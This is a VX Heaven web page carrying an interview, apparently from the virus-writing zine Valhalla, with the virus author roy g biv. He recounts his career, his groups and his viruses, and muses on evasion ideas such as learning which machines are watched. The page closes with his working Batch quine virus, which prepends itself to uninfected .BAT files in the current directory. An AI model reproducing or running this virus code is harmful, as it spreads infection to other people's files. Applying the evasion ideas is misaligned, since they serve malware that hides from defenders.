Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Interview with roy g biv

hh86, SPTH
Valhalla #4
November 2013

[Back to index] [Comments]

roy g biv has started writing viruses in the 1990s, and is still an active coder of self-replicators. He was member of 29A, has written many virus with novel and unexpected technqiues, many of them featured in security magazines.

You can reach him via [email protected]

The interview was done in two sessions via email in September/October 2013.

Have fun :)

Hey roy g biv, thanks alot for agreeing to this interview! First can you giveus a description of yourself please. How old are you, where have you been born/where do you live now? Whats your favorite music? etc...

Hello SPTH and hh86. I am 34 but I really stopped counting when I reached 30. I am from a country near the top of Africa, but I have lived in many places. After some trouble in one of those places, I moved to Iran. That became a different trouble but there it is.

I don't listen to any music. I prefer the silence.

Could you tell us about a usual day of roy g biv? :)

There is no usual day for me. I try to make each day different so that I become not predictable where I go and what I do.

What's your favorite movie and why do you like it? What has been the worst movie you've ever seen?

I don't watch any movies.

What is your favorite literature and literature author? In many of your codes, you have a short quote from "Danny Hillis" about a butterfly - what is this about?

I don't read any books. All of my information comes from the network, when I can connect to it. The quote is about the Butterfly Effect, but I like to think of it as my search for a place where I can change something. Maybe what I write will be used by many people (like TLS technique).

OK, you dont listen to music, you dont watch movies, you dont read any books. What else are you doing with your 24h/day :)

Just surviving, thinking, working. It's not a simple thing to do here.

In some forum you have mentioned a robbery in your house - can you tell something about it?

One day, thieves stole everything from my room. It looked like no-one lived there anymore. It happens a lot in that area. They bring a truck and take all of the furniture.

You wrote in some texts that you wrote your first virus in 1992. Can you please tell us when and where you've heared for the first time about viruses, why you found them interesting? How you wrote the first one, did you have some sources or documents of other viruswriters?

In 1992, Computer Virus Developments Quarterly was released, and some CDs of viruses became available. Before that, BBSes with virus source code were available. Prototype began with the source code to Diamond to make his Bad Seed virus, and I developed the code further.

When did you have the first contact to viruswriters, and how did you get this contact. Of course, today you just type "virus" into google and you find VX Heaven, but back in that days i guess it was different :)

The contact was using the mail. We would write letters to each other and send floppy disks.

You were sending letters and floppies via old-school post? :-o Never heared that before, I thought those people in early days were paranoid and would defintivly not share the postal addresses?

They were boxes at the mail office. No home addresses there.

From 1992 to 1995, you have written several codes, many of them under the group "defjam". Can you tell us a bit about this group, and about the other two members, Prototype and RT Fishel?

The group was just really two people writing PoCs for DOS.

RT Fishel wrote only one thing ever, which was a virus that stored its code in XMS and had a little swap routine in low memory. Anti-virus memory scanners could not find it because they did not scan the XMS.

Prototype was a good coder for DOS, he had advanced ideas about stealth but he never got the chance to implement them.

Did you had much contact with the vxers from that time? Did you had contact with Dark Avanger or Dark Angel or those other cool people?

No, I never had any contact with them. I think that they had retired before I started.

Between 1995 and 2001, you have been gone. What have you done these days and what made you come back and start a second carreer of coding awesome self-replicators?

I had to rest and heal, and in that time the world changed from 16-bit to 32-bit. When I felt better, it was time to challenge myself again.

You had many many kick-ass viruses in 29a#6, and joined that 29a-team in 2002/2003. Can you tell us a bit about the time in this legendary group? Did you had much contact with the other members? Have you planed codes together or talked alot about ideas and projects?

The group had a great reputation for producing new works, but internally it was like a shell with nothing inside. We would talk sometimes about what people were doing, and review the submissions for the zine, but no-one worked together on anything.

In 2008, the 29a was officially retired. What happened at the end? What was the problem and who decided that it goes officially offline?

Everyone left and VirusBuster called the end. No-one talked to each other, someone was sharing code with outsiders, and there was no trust. There was a server where we could log in and post message, but suddenly the access was denied and no discussion about it. I don't want to talk about names.

You have written so many great codes, can you give us short description of your favorite ones?

Shrug (2001) - this was a direct-action virus that infected PE files (EXE and DLL) without looking at the suffix. It was the first virus to use the TLS callback method to run the code before the entrypoint. It automatically selected the correct text-encoding method (ANSI for Windows 9x or Unicode for Windows NT+). If the relocations were at the end of the file, then the virus would move the relocations down and insert itself into the space. The virus also added random amounts of garbage to the end of the file to interfere with scanners that look at the end of the file. It was my first virus for 32-bit Windows. You never forget your first one.

Junkmail (2002) - this was my second attempt at a super Windows virus. It was EfishNC with a SMTP engine so it could send mail. It was the first virus that would send e-mail using polymorphic SMTP headers. For that, I had the help of RT Fishel who came out of retirement just for that project. The subject and message body were variable. The text was all compressed to save space and also to make it hard to know what it could say. It knew all of the vulnerable IFrame types (MS01-020). It could send in .BAT, OLE2, or PE formats. The .BAT part was polymorphic, too. RT Fishel wrote a executable-ASCII base64 decoder that used no dictionary! That was 2002, and I think that still some scanners cannot detect it. I spent much time implementing every idea that I had while still being fully compliant with the RFC.

Heaven (2011) - this was a direct-action virus that infected PE files (EXE and DLL) without looking at the suffix. There is nothing special about the infection method because it just changed the entrypoint directly. The special thing about the code was that it jumped from 32-bit mode to 64-bit mode on 64-bit systems. The power of the 64-bit world in a 32-bit loader.

Polymer (2011) - a truly polymorphic Batch virus. I knew that it could be done.

Recently you have been very busy coding many many first-of-its-kind self-replicators for new languages (for my "Language-Infection-Project" :) ). You hit more than 20 languages (so far) for the first time, just in the first 9 months of 2013 :-o Tell us what you like about touching new languages. What was your favorite language that you have infected recently? What did you learn when you coded self-replicators for so many different languages? How do you decide which language you want to infect next? What would be your three favorite victims in future?

I like the idea of being first. The Language Infection Project allows me to do that many times. :)

Algol the best that I have seen so far. It was a really superior language compared to some languages of today, even it was written in 1968.

My idea was to use a single technique and apply it to all of the languages. It is most interesting to see how differently that technique must be applied in the different languages.

To pick a language to target, I just look at the list and choose the first one. If I find that I cannot understand it quickly (maybe in one hour), then I move to the next one, and repeat until I succeed. For languages like Perl and Python and Lua, I studied them for the first time and then infected them all in under one hour. They are very easy to learn. For a language like APL, even I understand how it works, still it can take days to write something that works. I have tried several times to make the virus for Q language, but with no success so far.

I think that the really fun ones would be RPG, ActionScript, and PL/I. I hope to touch those in the next weeks.

Which of the code that you have written was the most difficult one? For which one are you most proud of?

In the past years, the Itanium virus was very difficult to write. When I look at it just now, I don't even understand it anymore. In this recent time, the APL virus was very hard for me, even it's only 19 lines long. The difficult things can change over time.

I am not proud of any of the viruses, but of the techniques. I am happy to see that TLS technique is used by many people, that SEH (soon must be VEH) for common code exit is very useful to make clean code, and 32-bit files can jump into 64-bit world.

When you have released the first infector for win64 files, there has been quite some media-echo. What did you think about that? Did you get alot of comments concerning your code?

I was surprised at the reaction but I don't remember any interesting contact from that time.

For many of your viruses, alot of research on file-formats, operation-system secrets etc. was required. Why do you prefere to release your findings as a virus-writer rather than a "reverse-engineerer"? Wouldn't that make your life easier?

To describe a technique by itself does not answer the question "how is it useful?", but to make a virus that uses it shows how it can be used, and we all benefit from that.

You released W32.Relock.B in valhalla#3, an updated version of your virtual-code technique for Windows 7. Some researchers said this technique is not possible on Win7. What did they miss and how did you prove them wrong?

They said that the relocation types that I use were not supported anymore. I proved them wrong by still using those types. :)

On the evening when valhalla#2 was released, you sent a mail 15mins before the release. It was a preview-version of your OpenGL version (the full version was released in valhalla#3 finally). Why did you decide to submit an unfinished preview version for the first time?

:) Because I wanted to be first. For five years, I wanted to finish that code and at any time, someone might have done it before me. I did not want that to happen.

What is your opinion on code optimization? How much time do you spend on it?

I think that the optimisation is good, because it makes the code look "cleaner", but I cannot spend too much time on it because I am not very good at it. The master of code optimisation was Super/29A. He was really super.

What do you think about self-mutations of codes? You wrote some very complex polymorphic viruses (for instance EfishNC), what have you learned there? Then there is and metamorphism (only a few viruses can do that). What do you think about that technique? Could you imagine some other, mutation techniques?

I learned that polymorphism is easy, and I have not achieved metamorphism at all so far. I wonder how much mutation is needed to be called metamorphic? For Polymer virus, if I swapped the order of the terms in the "if" blocks would that be enough? The body is mutated greatly already. To go beyond the simple changes like that requires so much code and details that I would be silent for a long time and work on nothing else. I do not know if that can be done. Of course, if I could do that, would be great. Metamorphism is a so powerful technique that I would be very happy to master it. For other mutation techniques, can there be anything else? A mutation must be applied to either the body or its decryptor. What is left? Oh, what about a virus that mutates its environment so that it can run? :) Yes, something else must run first to achieve that, but it is not necessarily the virus. I don't know how to do that but it seems like an interesting idea.

What do you think about self-learning codes? How could this be done? What could a code learn, what is an advantage?

A virus can learn which machines are protected more than others. If the virus has a way to communicate, and then the communication stops, the receiving code might decide that the virus was discovered and so not try to infect that machine anymore. A virus can learn which directories cannot be written, so they should be avoided in case someone is watching for attempts to access them.

A virus can learn about the user activity and might want to scan the network during times of high network activity so that it might not be noticed. A virus can learn which files a user accesses most and then make those files depend on the virus being present.

These are just some quick ideas. I should think more on these. It is a very interesting topic for sure.

What do you think about codes written for the purpose of stealing money, for creating botnets etc. Unfortuanatly thats a big buisness for many years. What is your opinion on that codes technique - for example on mutation or spreading techniques? Is it high-quality and you find it interesting, or is it only boring stuff?

I hate the idea that people make money from this. It destroys the scene for us since we are all considered to be criminals for this reason. Even worse is that their ideas are all poor or old. They make encryption routines that a child could break and their "stealth" is like elephants running through the room.

Have you ever got a job-offer due to your virus coding-projects? Like security-companies, anti-virus-companies? secret-service?

No, none of those. I rarely get any e-mail in the first place, and mostly it is spam.

Do you have contact to people who work in data-security?

No, the only people that I contact are you (SPTH and hh86) and now Promix a bit for his E-ZINE.

Do you know the work of academic researchers such as Eric Filiol and Mark Stamp, and what do you think about that?

I know who they are but I have not read their works.

What are your most favorite viruses/worms of all time, and why?

Hybris is my most favourite virus ever. The use of plug-ins was really smart.

Which techniques that have been developed since mid 80s have been most influential for virus-writing and creating self-replicators?

I don't know of a technique since the mid 80s. The quine technique that I find to be so powerful for touching new languages - this was done in the 60s.

Let's come to my favorite topic, the future :) How do you think will self replicators look like in short-term, like 5 years? in 15 years? And in long-term - 50years?

I wonder if they will be so different to now. The code is the code, and the OS API does not change much, so we will have our PoCs like always. The file formats will change but we will still infect them. Maybe I lack enough imagination to look ahead that far.

Imagine a nice ghost comes to you and offers you three wishes. What would it be? :)

Better health, longer life, and enough money to go somewhere safe. I imagine the things that I could code without interruption.

Thanks alot for your time! Feel free to fill the rest of the document with whatever you want.

I found a compiler for .bat, so... :)

@REM QUINE - ROY G BIV 19/09/13
@ECHO OFF
SETLOCAL ENABLEDELAYEDEXPANSION
SET A=4052454D205155494E45202D20524F592047204249562031392F30392F31330A40454348
4F204F46460A5345544C4F43414C20454E41424C4544454C41594544455850414E53494F4E0A53
455420413D0A53455420423D205222232452522728292A2B2C2D2E2F303132333435363738393A
3B523D523F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D525F6061
62636465666768696A6B6C6D6E6F707172737475767778797A7B527D7E0A464F52202F4C202525
4120494E2028302C322C3135313629444F2043414C4C3A45202525410A464F522025254120494E
20282A2E42415429444F2049462025257E5A41204C53532036303030302043414C4C3A49202525
410A454E444C4F43414C0A404543484F204F4E0A40474F544F3A4B0A3A450A49462025313D3D31
36302053455420463D2146212541250A534554202F4120473D307821413A7E25312C32210A5345
54202F4120483D472D33320A4946202547253D3D313020280A53455420463D2146215E0A0A2945
4C5345204946202548253D3D31202853455420463D2146215E5E210A29454C5345204946202548
253D3D35202853455420463D21462125250A29454C5345204946202548253D3D36202853455420
463D2146215E260A29454C5345204946202548253D3D3238202853455420463D2146215E3C0A29
454C5345204946202548253D3D3330202853455420463D2146215E3E0A29454C53452049462025
48253D3D3632202853455420463D2146215E5E5E5E0A29454C5345204946202548253D3D393220
2853455420463D2146215E7C0A29454C53452053455420463D21462121423A7E2548252C31210A
474F544F3A454F460A3A490A464F52202F462022544F4B454E533D2A222025254220494E202825
3129444F20280A534554204A3D2525420A49462022214A3A7E352C352122204E45512022515549
4E452220280A52454E20253120520A4543484F202146213E25310A5459504520523E3E25310A44
454C20520A290A474F544F3A454F460A290A3A4B0A
SET B= R"#$RR'()*+,-./0123456789:;[email protected]OPQRSTUVWXYZ[\]R_`abcdefghijklmnopqrstuvwxyz{R}~
FOR /L %%A IN (0,2,1516)DO CALL:E %%A
FOR %%A IN (*.BAT)DO IF %%~ZA LSS 60000 CALL:I %%A
ENDLOCAL
@ECHO ON
@GOTO:K
:E
IF %1==160 SET F=!F!%A%
SET /A G=0x!A:~%1,2!
SET /A H=G-32
IF %G%==10 (
SET F=!F!^

)ELSE IF %H%==1 (SET F=!F!^^!
)ELSE IF %H%==5 (SET F=!F!%%
)ELSE IF %H%==6 (SET F=!F!^&
)ELSE IF %H%==28 (SET F=!F!^<
)ELSE IF %H%==30 (SET F=!F!^>
)ELSE IF %H%==62 (SET F=!F!^^^^
)ELSE IF %H%==92 (SET F=!F!^|
)ELSE SET F=!F!!B:~%H%,1!
GOTO:EOF
:I
FOR /F "TOKENS=*" %%B IN (%1)DO (
SET J=%%B
IF "!J:~5,5!" NEQ "QUINE" (
REN %1 R
ECHO !F!>%1
TYPE R>>%1
DEL R
)
GOTO:EOF
)
:K
 
[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxer.org aka vx.netlux.org
deenesitfrplruua